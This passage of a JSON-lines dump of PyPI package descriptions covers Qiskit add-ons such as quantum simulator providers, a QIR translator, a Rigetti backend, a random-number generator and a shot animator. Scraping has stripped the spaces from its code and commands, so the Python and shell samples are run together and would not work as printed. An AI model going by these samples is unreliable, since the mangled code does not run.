\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\u250c\u2500\u2510\n q_0: \u25240 \u251c\u2524M\u251c\u2500\u2500\u2500\u25240 \u251c\u25240 \u251c\u2524M\u251c\u2500\u2500\u2500\n \u2502 my_gate(2*a) \u2502\u2514\u2565\u2518\u250c\u2500\u2510\u2502 \u2502\u2502 \u2502\u2514\u2565\u2518\u250c\u2500\u2510\n q_1: \u25241 \u251c\u2500\u256b\u2500\u2524M\u251c\u25241 \u251c\u25241 \u251c\u2500\u256b\u2500\u2524M\u251c\n \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2551 \u2514\u2565\u2518\u2502 \u2502\u2502 If_else \u2502 \u2551 \u2514\u2565\u2518\n q_2: \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524M\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256b\u2500\u2500\u256b\u2500\u2524 While_loop \u251c\u2524 \u251c\u2500\u256b\u2500\u2500\u256b\u2500\n \u2514\u2565\u2518 \u2551 \u2551 \u2502 \u2502\u2502 \u2502 \u2551 \u2551\nmid_0: \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256c\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2569\u2550\u2550\u256c\u2550\u25611 \u255e\u25610 \u255e\u2550\u256c\u2550\u2550\u256c\u2550\n \u2551 \u2551 \u2502 \u2502\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2551 \u2551\nmid_1: \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256c\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2569\u2550\u25610 \u255e\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256c\u2550\u2550\u256c\u2550\n \u2551 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2551 \u2551\nout_0: 
\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256c\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2569\u2550\u2550\u256c\u2550\n \u2551 \u2551\nout_1: \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256c\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2569\u2550\n \u2551\nout_2: \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2569\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550InstallationInstall the latest release of theqiskit_qasm3_importpackage from pip:pip install qiskit_qasm3_importThis will automatically install all the dependencies as well (an OpenQASM 3\nparser, for example) if they are not already installed. Alternatively, you can\ninstall Qiskit Terra directly with this package as an optional dependency by\ndoingpip install qiskit-terra[qasm3-import]DevelopingIf you're looking to contribute to this project, please first readour contributing guidelines.Set up your development environment by installing the development requirements\nwith pip:pipinstall-rrequirements-dev.txttoxThis installs a few more packages than the dependencies of the package at\nruntime, because there are some tools we use for testing also included, such astoxandpytest.After the development requirements are installed, you can install an editable\nversion of the package withpipinstall-e.After this, any changes you make to the library code will immediately be present\nwhen you open a new Python interpreter session.Building documentationAfter the development requirements have been installed, the commandtox-edocswill build the HTML documentation, and place it indocs/_build/html. The\ndocumentation state of themainbranch of this repository is published tohttps://qiskit.github.io/qiskit-qasm3-import.Code style and lintingThe Python components of this repository are formatted usingblack. 
You can\nrun this on the required files by runningtox-eblackThe full lint suite can be run withtox-elintLicenseThis project is licensed underversion 2.0 of the Apache License."} +{"package": "qiskit-qcgpu-provider", "pacakge-description": "# Qiskit QCGPU ProviderThis module contains [Qiskit](https://www.qiskit.org/)simulators using the OpenCL based [QCGPU](https://qcgpu.github.io) library.This provider adds two quantum circuit simulators, which are:* Statevector simulator - returns the statevector of a quantum circuit applied to the |0> state* Qasm simulator - simulates a qasm quantum circuit that has been compiled to run on the simulator.These simulation backends take advantage of the GPU or other OpenCL devices.## InstallationFirst of all, you will have to have some OpenCL installation installed already.You can install this module from PyPI using pip:```bash$ pip install qiskit-qcgpu-provider```## UsageThe usage of this backend with Qiskit is shown in the [usage example](https://github.com/Qiskit/qiskit-qcgpu-provider/tree/master/examples)For more information on Qiskit and quantum simulations, look at the Qiskit tutorials and the [Qiskit instructions page](https://github.com/Qiskit/qiskit-terra)## BenchmarkingTo benchmark this simulator against the `BasicAer` `qasm_simulator`,you can run```bash$ python3 benchmark.py --samples 15 --qubits 5 --single True```## LicenseThis project uses the [Apache License Version 2.0 software license.](https://www.apache.org/licenses/LICENSE-2.0)"} +{"package": "qiskit-qcware", "pacakge-description": "No description available on PyPI."} +{"package": "qiskit-qir", "pacakge-description": "qiskit-qirQiskit to QIR translator.ExamplefromqiskitimportQuantumCircuitfromqiskit_qirimportto_qir_modulecircuit=QuantumCircuit(3,3,name=\"my-circuit\")circuit.h(0)circuit.cx(0,1)circuit.cx(1,2)circuit.measure([0,1,2],[0,1,2])module,entry_points=to_qir_module(circuit)bitcode=module.bitcodeir=str(module)InstallationInstallqiskit-qirwithpip:pipinstallqiskit-qirNote: this will automatically install PyQIR if needed.DevelopmentInstall from sourceTo install the package from source, clone the repo onto your machine, browse to the root directory and runpipinstall-e.TestsFirst, install the development dependencies usingpipinstall-rrequirements_dev.txtTo run the tests in your local environment, runmaketestTo run the tests in virtual environments on supported Python versions, runmaketest-allDocsTo build the docs using Sphinx, runmakedocs"} +{"package": "qiskit-qir-alice-bob-fork", "pacakge-description": "qiskit-qirQiskit to QIR translator.This is a temporary fork until the upstream qiskit-qir supports user-defined\ninstructions.ExamplefromqiskitimportQuantumCircuitfromqiskit_qirimportto_qir_modulecircuit=QuantumCircuit(3,3,name=\"my-circuit\")circuit.h(0)circuit.cx(0,1)circuit.cx(1,2)circuit.measure([0,1,2],[0,1,2])module,entry_points=to_qir_module(circuit)bitcode=module.bitcodeir=str(module)InstallationInstallqiskit-qirwithpip:pipinstallqiskit-qirNote: this will automatically install PyQIR if needed.DevelopmentInstall from sourceTo install the package from source, clone the repo onto your machine, browse to the root directory and runpipinstall-e.TestsFirst, install the development dependencies usingpipinstall-rrequirements_dev.txtTo run the tests in your local environment, runmaketestTo run the tests in virtual environments on supported Python versions, runmaketest-allDocsTo build the docs using Sphinx, runmakedocs"} +{"package": "qiskit-qrack-provider", "pacakge-description": 
"qiskit-qrack-providerThis repository contains a Qrack provider for Qiskit. You mustinstall PyQrackto use it.The underlying Qrack simulator is a high-performance, GPU-accelarated, noiseless simulator, by design. This repository provides the QrackQasmSimulator.This provider is based on and adapted from work by the IBM Qiskit Team and QCGPU's creator, Adam Kelly. Attribution is noted in content files, where appropriate. Original contributions and adaptations were made by Daniel Strano of the VM6502Q/Qrack Team.To use, in Qiskit:fromqiskit.providers.qrackimportQrackbackend=Qrack.get_backend('qasm_simulator')For example, for use withunitaryfund/mitiq, creating a (noiseless)executorcan be as simple as follows:fromqiskit.providers.qrackimportQrackdefexecutor(circuit,shots=1000):\"\"\"Executes the input circuit and returns the noisy expectation value , where A=|0><0|.\"\"\"# Use the Qrack QasmSimulator backend, (but it's specifically noiseless)ideal_backend=Qrack.get_backend('qasm_simulator')# Append measurementscircuit_to_run=circuit.copy()circuit_to_run.measure_all()# Run and get countsprint(f\"Executing circuit with{len(circuit)}gates using{shots}shots.\")job=ideal_backend.run(circuit_to_run,shots=shots)counts=job.result().get_counts()# Compute expectation value of the observable A=|0><0|returncounts[\"0\"]/shotsGenerally, you will need to adapt the aboveexecutorsnippet to your particular purpose.(Happy Qracking! You rock!)"} +{"package": "qiskit-qryd-provider", "pacakge-description": "Qiskit QRyd ProviderThis Python library contains a provider for theQiskitquantum computing framework. The provider allows for accessing the GPU-based emulator and the future Rydberg quantum computer of theQRydDemoconsortium.Interactive tutorials can be found on QRydDemo'sJupyter server.InstallationThe provider can be installed viapipfromPyPI:pipinstallqiskit-qryd-providerBasic UsageTo use the provider, a QRydDemo API token is required. The token can be obtained via ouronline registration form. You can use the token to initialize the provider:fromqiskit_qryd_providerimportQRydProviderprovider=QRydProvider(\"MY_TOKEN\")Afterwards, you can choose a backend. Different backends are available that are capable of running ideal simulations of quantum circuits. An inclusion of noise models is planned for the future. You can either choose a backend emulating 30 qubits arranged in a 5x6 square lattice with nearest-neighbor connectivitybackend=provider.get_backend(\"qryd_emulator$square\")or a backend emulating 30 qubits arranged in a triangle lattice with nearest-neighbor connectivitybackend=provider.get_backend(\"qryd_emulator$triangle\")If you use these backends, the compilation of quantum circuits happens on our servers. The circuits are compiled to comply with the native gate set and connectivity of the Rydberg platform, using a decomposer developed byHQS Quantum Simulations.After selecting a backend, you can run a circuit on the backend:fromqiskitimportQuantumCircuit,executeqc=QuantumCircuit(2,2)qc.h(0)qc.cx(0,1)qc.measure([0,1],[0,1])job=execute(qc,backend,shots=200)print(job.result().get_counts())Expert OptionsThe provider adds the phase-shifted controlled-Z gate (PCZGate) and the phase-shifted controlled-phase gate (PCPGate) to Qiskit. These gates equal the controlled-Z/phase gates up to single-qubit phase gates. The gates can be realized by the Rydberg platform in multiple ways [1,2,3]. 
The value of the phase shift of the PCZGate can be modified before using the backend via:fromqiskit_qryd_providerimportPCZGatePCZGate.set_theta(1.234)LicenseThe Qiskit QRyd Provider is licensed under theApache License 2.0."} +{"package": "qiskit-quainter", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qiskit-quaintier", "pacakge-description": "A Quantum backend provider"} +{"package": "qiskit-quantier", "pacakge-description": "QUANTier qiskit backend provider.Supports AerSimulator and QUANTierBackend as a backend.Build and upload to PyPI\n$ python3 -m build\n$ python3 -m twine upload dist/*"} +{"package": "qiskit-quantum-knn", "pacakge-description": "Qiskit Quantum kNNQiskit Quantum kNNis a pure quantum knn classifier for a gated quantum\ncomputer, which is build withQiskit.Qiskit Quantum kNN is made as a final project to fulfill a master's degree\nat the Radboud University Nijmegen, in collaboration with ING Quantum\nTechnology. It is build by usingAfham et al. (2020)as it's\nprimary guide on how to construct the quantum circuit used for distance\nmeasurements.InstallationThe best way of installingqiskit-quantum-knnis by usingpip:$pipinstallqiskit-quantum-knnSinceqiskit-quantum-knnruns mainly by usingqiskit, it is advised to check\nout theirinstallation guideon how to install Qiskit.LicenseApache License 2.0"} +{"package": "qiskit-qubit-reuse", "pacakge-description": "Qubit Reuse By Reset PluginThis repository contains an experimental transpiler pass calledqubit_reusewhich is executed at the end of theinitstage of transpilation. This pass is based on: Matthew DeCross et al. \"Qubit-reuse compilation with mid-circuit measurement and reset\"arXiv:2210.0.08039v1BackgroundCertain circuits can reduce the number of qubits required to produce results by resetting and re-using existent measured qubits. The order in which certain qubits are chosen is based on theircausal conesand the order in which they are measured.Causal ConesLet's say we have qubit a x in aDAGCircuit. We can traverse theDAGCircuitfrom the output node of x by checking all its predecessor nodes. When checking every operation node found, if at any point x interacts with other qubits, via a multi-qubit gate, the qubits in that operation are added to a set. From that point we continue evaluating recursively all the predecessor nodes in that multi-qubit interaction and adding all qubits found into the set, until no more predecessor nodes are left.When the traversal ends, the set will containall the qubits whose interactions affect qubit x. That is what we call the causal cone of x.Order of MeasurementQubits are re-arranged based on the length of their causal cones in ascending order, i.e. the first to be re-arranged are those with smaller causal cones.Before re-arranging a qubit, we need to check if there are any qubit that have been measured and is available to re-use. If so, we reset it and apply all operations onto its wire. Otherwise, a new qubit is added and the operations are passed on to that wire.InstallationThis package is not available through pypi, but can be installed by cloning this repository:gitclonehttps://github.com/qiskit-community/qiskit-qubit-reuseAnd then installing locally:pipinstall./qiskit-qubit-reuseIf you have the proper authentication keys, you can install it remotely by using:pipinstallgit+https://github.com/qiskit-community/qiskit-qubit-reuseUsageOnce installed, Qiskit is able to detect thequbit_reuseplugin via an entry point. 
All that needs to be done is to specify the init method in yourtranspilecall by usinginit_method=\"qubit_reuse\". Use the following example:fromqiskit.circuit.randomimportrandom_circuitfromqiskitimporttranspilefromqiskit.providers.fake_providerimportFakeGuadalupeV2qc=random_circuit(16,4,measure=True)transpiled_qc=transpile(qc,backend=FakeGuadalupeV2(),init_method=\"qubit_reuse\")This entry point provides the option with the fewest qubits. If you want to specifically use the normal or dual circuit, you can specify that by using thequbit_reuse_normalor thequbit_reuse_dualendpoints.Warning: This plugin should only be used with circuits that contain measurements."}
+{"package": "qiskit-qulacs", "pacakge-description": "Qiskit-Qulacs allows users to execute Qiskit programs using Qulacs backend.Qiskit-Qulacs is actively being developed, and we welcome your input and suggestions on the API and use-cases. If you have any ideas or feedback, please feel free to open a GitHub issue or contact us. We are interested in hearing about your experiences using the library.AboutBeginner's GuideInstallationQuickstart GuideTutorialsHow-TosHow to Give FeedbackContribution GuidelinesReferences and AcknowledgementsLicenseFor Developers/ContributorsContribution GuideTechnical DocsHow to Give FeedbackWe encourage your feedback! You can share your thoughts with us by:Opening an issuein the repositoryContribution GuidelinesFor information on how to contribute to this project, please take a look at ourcontribution guidelines.References and Acknowledgements[1] Qiskithttps://qiskit.org/[2] Qiskit-terrahttps://github.com/Qiskit/qiskit-terra[3] Qulacshttps://github.com/qulacs/qulacsLicenseApache License 2.0"}
+{"package": "qiskit-qutree-cloud-provider", "pacakge-description": "No description available on PyPI."}
+{"package": "qiskit-qutrit-calibration", "pacakge-description": "Qutrit CalibrationA qutrit experiment extension forQiskit Experiments. This package allows for straightforward calibration of single qutrit gates.Note:A word of caution: this package is an alpha release and subject to breaking API changes without much notice.Once installed it can be imported usingimportqiskit_qutrit_calibrationInstallationThis package can be installed in one of three ways:Installed via pip aspipinstallqiskit-qutrit-calibrationInstalled from the downloaded repository using pip ascdqiskit-qutrit-calibration\npipinstall.Installed directly using the github urlpipinstallgit+https://github.com/qiskit-community/qutrit-calibrationUsageThis package allows users to spin up their own calibration experiments for single qutrit gatesSX12,X12,Sy12,Y12, andRZ12. The experiments to tune up these gates include:RoughEFFrequencyCalRoughEFAmplitudeCalNarrowBandSpectroscopyCalRoughEFXDragCalFineEFXAmplitudeCalSimply create a newQutritCalibrationsobject usingcals=QutritCalibrations.from_backend(backend)Then execute an experiment using the instantiatedQutritCalibrations, aTupleof qubit indices, and backend to run on. For example,fromqiskit_qutrit_calibrationimportlibraryexp=library.RoughEFFrequencyCal((qubit_index),calibrations=cals,backend=backend)Development ScriptsThis package includes several pre-configuredtoxscripts for automating\ndevelopment of your package. These commands can be run from the command linecdqutrit-calibration\ntox-eCommandDescription``py`Run unit tests for the package usingstestrblackAuto-format your package files usingBlacklintRun PyLint on your package to check code formatting.
Note that linting will fail if runningblackwould modify any filesdocsGenerate documentation for the package using SphinxIf you do not already have the tox command installed, install it by runningpipinstalltoxTesting Your PackageThis package is configured withstestrandtoxscripts to run unit tests\nadded to thequtrit-calibration/testfolder.These can be run directly viastestrusing the commandcdqutrit-calibration\nstestrrunOr using to tox scripttox -e pyto install all dependencies and run the tests\nin an isolated virtual environment.To add tests to your package you must including them in a files prefixed astest_*.pyin thetest/folder or a subfolder. Tests should be written\nusing theunittestframework to make a test class containing each test\nas a separate method prefixed astest_*.For example:classBasicTests(unittest.TestCase):\"\"\"Some basic tests for Qiskit Qutrit Calibration\"\"\"deftest_something(self):\"\"\"A basic test of something\"\"\"# Write some code heresome_value=...target=...self.assertTrue(some_value,target)Documenting Your PackageYou can add documentation or tutorials to your package by including it in thequtrit-calibration/docsfolder and building it locally using\nthetox -edocscommand.Documentation is build using Sphinx. By default will include any API documentation\nadded to your packages main__init__.pyfile.LicenseApache License 2.0"} +{"package": "qiskit-rigetti", "pacakge-description": "Rigetti Provider for QiskitTry It OutTo try out this library, you can run example notebooks in a pre-madebinder. Alternately, you can run the following to build and run the image locally:dockerbuild-tqiskit-tutorials.\ndockerrun--rm-p8888:8888qiskit-tutorialsthen click on the link that is displayed after the container starts up.Pre-requisitesInstallDockerDownloadqelib1.incPlaceqelib1.incin a folder calledincin the project rootSetup QVM and quilcUsing Docker ComposeRundocker compose upto see service logs ordocker compose up -dto run in the background.Using Docker ManuallyStart the QVM:dockerrun--rm-it-p5000:5000rigetti/qvm-SStart the compiler:dockerrun--rm-it-p5555:5555-v\"$PWD\"/inc:/incrigetti/quilc-S-P--safe-include-directory/inc/UsageExample:fromqiskitimportexecutefromqiskit_rigettiimportRigettiQCSProvider,QuilCircuit# Get provider and backendp=RigettiQCSProvider()backend=p.get_simulator(num_qubits=2,noisy=True)# or p.get_backend(name='Aspen-9')# Create a Bell state circuitcircuit=QuilCircuit(2,2)circuit.h(0)circuit.cx(0,1)circuit.measure([0,1],[0,1])# Execute the circuit on the backendjob=execute(circuit,backend,shots=10,coupling_map=backend.coupling_map)# Grab results from the jobresult=job.result()# Return memory and countsmemory=result.get_memory(circuit)counts=result.get_counts(circuit)print(\"Result memory:\",memory)print(\"Result counts:\",counts)Rigetti Quantum Cloud Services (QCS)Execution against a QPU requires areservation via QCS.\nFor more information on using QCS, see theQCS documentation.AdvancedLifecycle HooksFor advanced QASM and Quil manipulation,before_compileandbefore_executekeyword arguments can be passed toRigettiQCSBackend.run()or to Qiskit'sexecute().Pre-compilation HooksAnybefore_compilehooks will apply, in order, just before compilation from QASM to native Quil.\nFor example:...defcustom_hook_1(qasm:str)->str:new_qasm=...returnnew_qasmdefcustom_hook_2(qasm:str)->str:new_qasm=...returnnew_qasmjob=execute(circuit,backend,shots=10,before_compile=[custom_hook_1,custom_hook_2])...Pre-execution HooksAnybefore_executehooks will apply, in order, just before execution 
(after translation from QASM to native Quil).\nFor example:frompyquilimportProgram...defcustom_hook_1(quil:Program)->Program:new_quil=...returnnew_quildefcustom_hook_2(quil:Program)->Program:new_quil=...returnnew_quiljob=execute(circuit,backend,shots=10,before_execute=[custom_hook_1,custom_hook_2])...Note:Onlycertain forms of Quil can can be executed on a QPU.\nIf pre-execution transformations produce a final program that is not QPU-compliant,ensure_native_quil=Truecan be\npassed toexecute()orRigettiQCSBackend.run()to recompile the final Quil program to native Quil prior to\nexecution. If no pre-execution hooks were supplied, this setting is ignored. If this setting is omitted, a value ofFalseis assumed.Example: Adding the Quil instructionH 0would result in an error ifensure_native_quil=Falseand the QPU does\nnot natively implement Hadamard gates.Built-in HooksThehooks.pre_compilationandhooks.pre_executionpackages provide a number of convenient hooks:set_rewiringUseset_rewiringto provide arewiring directiveto the Quil compiler. For example:fromqiskit_rigetti.hooks.pre_compilationimportset_rewiring...job=execute(circuit,backend,shots=10,before_compile=[set_rewiring(\"NAIVE\")])...Note: Rewiring directives requirequilcversion 1.25 or higher.enable_active_resetUseenable_active_resetto enableactive qubit reset,\nan optimization that can significantly reduce the time between executions. For example:fromqiskit_rigetti.hooks.pre_executionimportenable_active_reset...job=execute(circuit,backend,shots=10,before_execute=[enable_active_reset])...DevelopmentNote: This module is developed in Python 3.8, 3.9, and 3.10, other versions will currently fail type checking.Dependencies are managed withPoetryso you need to install that first. Once you've installed all dependencies (poetry install) and activated the virtual environment (poetry shell), you can use these rules from theMakefileto run common tasks:Run tests:make testCheck style and types:make check-allCheck style only:make check-styleCheck types only:make check-typesReformat all code (to makecheck-stylepass):make formatBuild documentation, serve locally, and watch for changes:make watch-docs(requiresdocsextra:poetry install -E docs)"} +{"package": "qiskit-rng", "pacakge-description": "Qiskit Random Number GenerationQiskit is an open-source framework for working with noisy intermediate-scale\nquantum computers (NISQ) at the level of pulses, circuits, and algorithms.This project contains support for Random Number Generation usingQiskitandIBM Quantum Experiencebackends. The\nresulting raw numbers can then be passed toCambridge Quantum Computing(CQC)\nrandomness extractors to get higher-quality random numbers.InstallationYou can install the project using pip:pipinstallqiskit_rngPIP will handle all python dependencies automatically, and you will always\ninstall the latest (and well-tested) version.UsageSetting up the IBM Quantum ProviderYou will need setup your IBM Quantum Experience account and provider in order to\naccess IBM Quantum backends. 
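If your IBM Quantum credentials are not yet stored locally, they can be saved once so that the `IBMQ.load_account()` call in the example below can find them (a minimal sketch; the token string is a placeholder for your own API token):

```python
from qiskit import IBMQ

# One-time credential setup; replace the placeholder with your own API token.
IBMQ.save_account("MY_API_TOKEN")
```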
Seeqiskit-ibmq-providerfor more details.Generating random numbers using an IBM Quantum backendTo generate random numbers using an IBM Quantum backend:fromqiskitimportIBMQfromqiskit_rngimportGeneratorIBMQ.load_account()rng_provider=IBMQ.get_provider(hub='MY_HUB',group='MY_GROUP',project='MY_PROJECT')backend=rng_provider.backends.ibmq_ourencegenerator=Generator(backend=backend)output=generator.sample(num_raw_bits=1024).block_until_ready()print(output.mermin_correlator)Theoutputyou get back contains useful information such as the\nWeak Source of Randomness (result.wsr) used to generate the circuits, the resulting bits\n(result.raw_bits), and the Mermin correlator value (result.mermin_correlator).Using CQC extractors to get highly random outputIf you have access to the CQC extractors, you can feed the outputs from the previous\nstep to obtain higher quality random numbers:random_bits=output.extract()The code above uses the default parameter values, but the extractor is highly\nconfigurable. See documentation for some use case examples and parameter suggestions.DocumentationUsage and API documentation can be foundhere.LicenseApache License 2.0."} +{"package": "qiskit-scheduling-extension", "pacakge-description": "Qiskit Scheduling Extension PluginThis repository contains an extension library of pass manager plugins that can be used in thescheduling stageof Qiskit transpiler.Install and Use pluginTo use the scheduling extension plugin first install qiskit-scheduling-extension:pipinstallqiskit-scheduling-extensionOnce you have the plugin package installed you can use the plugin via thescheduling_methodargument on Qiskit'stranspile()function. For example,\nif you wanted to use thecompactscheduling method to compile a 15 qubit quantum\nvolume circuit for a backend you would do something like:fromqiskitimporttranspilefromqiskit.circuit.libraryimportQuantumVolumefromqiskit.providers.fake_providerimportFakePragueqc=QuantumVolume(15)qc.measure_all()backend=FakePrague()transpile(qc,backend,scheduling_method=\"compact\")Authors and CitationThe qiskit-scheduling-extension is the work ofmany peoplewho contribute to the project at different levels."} +{"package": "qiskit-shots-animator", "pacakge-description": "Quantum-Computer Microwave-Pulse AnimatorQiskitis an open-source framework for working with noisy quantum computers at the level of pulses, circuits, and algorithms. Tea Vui Huang'sQiskit-Shots-Animatoranimates microwave-pulse shots in a quantum circuit execution as microwave flashes either on a gate map, or x-ray photo of the quantum computer chip. Microwave measurement pulses interact with qubits via readout resonators and are reflected back, the animation illustrates readout microwave (MW) pulses at the corresponding Rx read-out resonators.UsagefromIPython.core.displayimportdisplay,Imagefromqiskit_shots_animator.visualizationimportsave_quantum_animation,get_supported_samples,get_sampleImport theqiskit-shots-animatorfunctions and callsave_quantum_animation()with the following parameters:filename (str): file name to save astype (str): 'gate' or 'xray'fps (int): shots per secondcounts (dict): job result counts, e.g. for 1024 shots: {'000': 510, '111': 514}sample (str): sample name, e.g. 'albatross'labelled (boolean): True or False, only for type='xray'microwave_color (str): Python colors, e.g. 'white', 'lightblue' etcmicrowave_intensity (int): 0.1 to 1.0 (weakest to strongest)Examples1a. 
Animate quantum circuit execution on gate map at 3 shots/sec on Qiskit-Aer backend withget_sample()to auto-select quantum deviceimportqiskit.tools.jupyterfromqiskitimportIBMQ,QuantumCircuit,Aer,executefromqiskit.circuit.randomimportrandom_circuitfromIPython.core.displayimportdisplay,Imagefromqiskit_shots_animator.visualizationimportsave_quantum_animation,get_supported_samples,get_sample# Generate and execute a 5-qubit random-circuit on Qiskit-Aer backendbackend=Aer.get_backend('qasm_simulator')while(1):circ=random_circuit(5,2,max_operands=3,measure=True)counts=execute(circ,backend,shots=1000).result().get_counts()iflen(counts)>4:break# Save & display animation of quantum circuit executionfilename=\"quantum-shots_5q.gif\"save_quantum_animation(filename,\"gate\",3,counts,get_sample(backend,circ))img=Image(filename);img.reload();display(img)print(circ.draw())'Sparrow' quantum device:1b. Animate quantum circuit execution on gate map at 3 shots/sec with 'giraffe' devicefilename=\"quantum-shots_5q_giraffe.gif\"save_quantum_animation(filename,\"gate\",3,counts,\"giraffe\")img=Image(filename);img.reload();display(img)'Giraffe' quantum device:1c. Animate quantum circuit execution on a labelled x-ray photo at 3 shots/sec, with microwave color 'lightblue' & microwave intensity 0.6filename=\"quantum-shots_5q_sparrow_xray-labelled.gif\"save_quantum_animation(filename,\"xray\",3,counts,get_sample(backend,circ),labelled=True,microwave_color=\"lightblue\",microwave_intensity=0.6)img=Image(filename);img.reload();display(img)'Sparrow' quantum device:1d. Animate quantum circuit execution on an unlabelled x-ray photo at 3 shots/sec, with microwave color 'white' & microwave intensity 0.5filename=\"quantum-shots_5q_sparrow_xray-unlabelled.gif\"save_quantum_animation(filename,\"xray\",3,counts,get_sample(backend,circ),labelled=False,microwave_color=\"white\",microwave_intensity=0.5)img=Image(filename);img.reload();display(img)'Sparrow' quantum device:1e. Animate quantum circuit execution on all supported devices at 3 shots/sec usingget_supported_samples()forsampleinget_supported_samples():print(sample);filename=\"quantum-shots_5q_\"+sample+\".gif\"if(save_quantum_animation(filename,\"gate\",3,counts,sample)==True):img=Image(filename);img.reload();display(img)2. Animate 15-qubits random-number-generator quantum circuit execution on IBMQ providerimportqiskit.tools.jupyterfromqiskitimportIBMQ,QuantumCircuit,Aer,executefromqiskit.circuit.randomimportrandom_circuitfromIPython.core.displayimportdisplay,Imagefromqiskit_shots_animator.visualizationimportsave_quantum_animation,get_sample,get_supported_samples# Generate and execute random circuit remotely on ibmq_qasm_simulatorprovider=IBMQ.load_account()provider=IBMQ.get_provider(hub='ibm-q')# Use 'ibmq_16_melbourne' if don't mind waiting in the queuebackend=provider.get_backend('ibmq_qasm_simulator')# Build a random-number-generator quantum circuitrng_size=15;circ=QuantumCircuit(rng_size,rng_size)circ.h(range(rng_size))# Applies hadamard gate to all qubitscirc.measure(range(rng_size),range(rng_size))# Measures all qubitscounts=execute(circ,backend,shots=1000).result().get_counts()# Save & display animation of quantum circuit executionfilename=\"quantum-shots_15q.gif\"save_quantum_animation(filename,\"gate\",3,counts,get_sample(backend,circ))img=Image(filename);img.reload();display(img)print(circ.draw())15-qubits 'Albatross' quantum device:3. 
Animate 20-qubits random-number-generator quantum circuit execution on IBMQ providerimportqiskit.tools.jupyterfromqiskitimportIBMQ,QuantumCircuit,Aer,executefromqiskit.circuit.randomimportrandom_circuitfromIPython.core.displayimportdisplay,Imagefromqiskit_shots_animator.visualizationimportsave_quantum_animation,get_sample,get_supported_samples# Generate and execute random circuit remotely on ibmq_qasm_simulatorprovider=IBMQ.load_account()provider=IBMQ.get_provider(hub='ibm-q')backend=provider.get_backend('ibmq_qasm_simulator')# Build a random-number-generator quantum circuitrng_size=20;circ=QuantumCircuit(rng_size,rng_size)circ.h(range(rng_size))# Applies hadamard gate to all qubitscirc.measure(range(rng_size),range(rng_size))# Measures all qubitscounts=execute(circ,backend,shots=1000).result().get_counts()# Save & display animation of quantum circuit executionfilename=\"quantum-shots_20q_unknown20a.gif\"save_quantum_animation(filename,\"gate\",3,counts,\"unknown20a\")img=Image(filename);img.reload();display(img)filename=\"quantum-shots_20q_unknown20b.gif\"save_quantum_animation(filename,\"gate\",3,counts,\"unknown20b\")img=Image(filename);img.reload();display(img)print(circ.draw())20-qubits quantum device:20-qubits quantum device:4. Animate 53-qubits random-number-generator quantum circuit execution on Qiskit-Aer backendimportqiskit.tools.jupyterfromqiskitimportIBMQ,QuantumCircuit,Aer,executefromqiskit.circuit.randomimportrandom_circuitfromIPython.core.displayimportdisplay,Imagefromqiskit_shots_animator.visualizationimportsave_quantum_animation,get_sample,get_supported_samples# Generate and execute random circuit locally on Aer qasm_simulatorbackend=Aer.get_backend('qasm_simulator')# Build a quantum circuit - random number generatorrng_size=53;circ=QuantumCircuit(rng_size,rng_size)circ.h(range(rng_size))# Applies hadamard gate to all qubitscirc.measure(range(rng_size),range(rng_size))# Measures all qubitscounts=execute(circ,backend,shots=1000).result().get_counts()# Save & display animation of quantum circuit executionfilename=\"quantum-shots_53q_unknown53a.gif\"save_quantum_animation(filename,\"gate\",3,counts,\"unknown53a\")img=Image(filename);img.reload();display(img)print(circ.draw())53-qubits quantum device:Author and CitationTea Vui Huang. (2020, November 10).\nQiskit Quantum-Computer Microwave-Pulse Animator.https://doi.org/10.5281/zenodo.4266489"} +{"package": "qiskit-sliqsim-provider", "pacakge-description": "SliQSim Qiskit Interface - Execute SliQSim on QiskitIntroductionThis is a Qiskit provider forSliQSimwhere you can executeSliQSimfrom Qiskit framework as a backend option.SliQSimis a BDD-based quantum circuit simulator implemented in C/C++ on top ofCUDDpackage. InSliQSim, a bit-slicing technique based on BDDs is used to represent quantum state vectors. 
